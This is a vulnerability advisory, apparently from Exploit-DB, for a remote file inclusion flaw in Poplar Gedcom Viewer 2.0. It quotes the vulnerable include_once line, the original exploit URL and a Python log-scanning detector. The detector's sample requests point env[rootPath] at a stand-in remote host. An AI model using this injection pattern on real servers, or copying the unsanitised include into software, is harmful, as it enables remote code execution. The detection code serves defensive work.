Vendor: Poplar Gedcom Viewer
By: GolD_M = Mahmood_ali
CVSS: 7.5 (HIGH)
CWE: Remote Code Execution
Product Name: Poplar Gedcom Viewer
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Poplar Gedcom Viewer v2.0 final

The vulnerability is in the '/include/common.php' file of Poplar Gedcom Viewer v2.0: line 51 uses $env['rootPath'] to build the path passed to include_once. By manipulating the 'env[rootPath]' request parameter, an attacker can execute arbitrary code on the server.

Mitigation:

Update to a patched version of the software or apply necessary security measures to prevent unauthorized access.
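
One way to check web server access logs for requests that set this parameter, as an added example that is not part of the original advisory or the project's code. It assumes Apache/nginx common or combined log format; the function name, field names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache/nginx common or combined log format (assumed).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
PARAM = "env[rootPath]"          # parameter named in the advisory
SCRIPT = "/include/common.php"   # script named in the advisory
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def find_rootpath_overrides(lines):
    """Return a finding for every request that sets env[rootPath] in its query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes names and values once, as PHP does,
        # so env%5BrootPath%5D is caught as well as the literal form.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name != PARAM:
                continue
            findings.append({
                "client": m["client"],
                "path": path,
                "direct_hit": path.endswith(SCRIPT),   # request went straight to common.php
                "value": value,
                "remote_url": bool(SCHEME_RE.match(value)),  # value carries a URL scheme
                "status": int(m["status"]),            # 200 deserves a closer look than 404
            })
    return findings


# Constructed sample lines (documentation IP ranges, made-up host names).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2007:10:01:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Jan/2007:10:04:40 +0000] "GET /include/common.php?env[rootPath]=http://files.example.test/i HTTP/1.0" 200 312',
    '198.51.100.9 - - [12/Jan/2007:10:04:55 +0000] "GET /gedcom/include/common.php?env%5BrootPath%5D=http%3A%2F%2Ffiles.example.test%2Fi HTTP/1.0" 404 208',
    '203.0.113.5 - - [12/Jan/2007:10:06:11 +0000] "GET /search.php?rootPath=/tree HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in find_rootpath_overrides(SAMPLE_LOG):
        print(finding)
```

No legitimate client has a reason to send this parameter, so any finding is worth triage, with `status` 200 on a `direct_hit` first.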

Exploit-DB raw data:

/###################################################################\
# Poplar Gedcom Viewer v2.0 final                                   #
# =========================================================         #
# Published : 2007-01-00                                            #
# Remote: Yes                                                       #
# Site:ftp://ftp1.comscripts.com/PHP/689_poplarge-20.zip            #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& THE GENERAL & Asb-May.Net      #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# In :                                                              #
# /include/common.php                                               #
# Line:                                                             #
# 51                                                                #
# Vulnerable Code:                                                  #
# include_once( $env['rootPath'].'/include/adodb/adodb.inc.php' )   #
# 3XP|0!T :                                                         #
# /include/common.php?env[rootPath]=[EV!L-CODE]                     #
#                                                                   #
#             /#######################################\             #
#             #         Tryag.Com & Dwrat.Com         #             #
#             \#######################################/             #
\###################################################################/

# milw0rm.com [2007-01-12]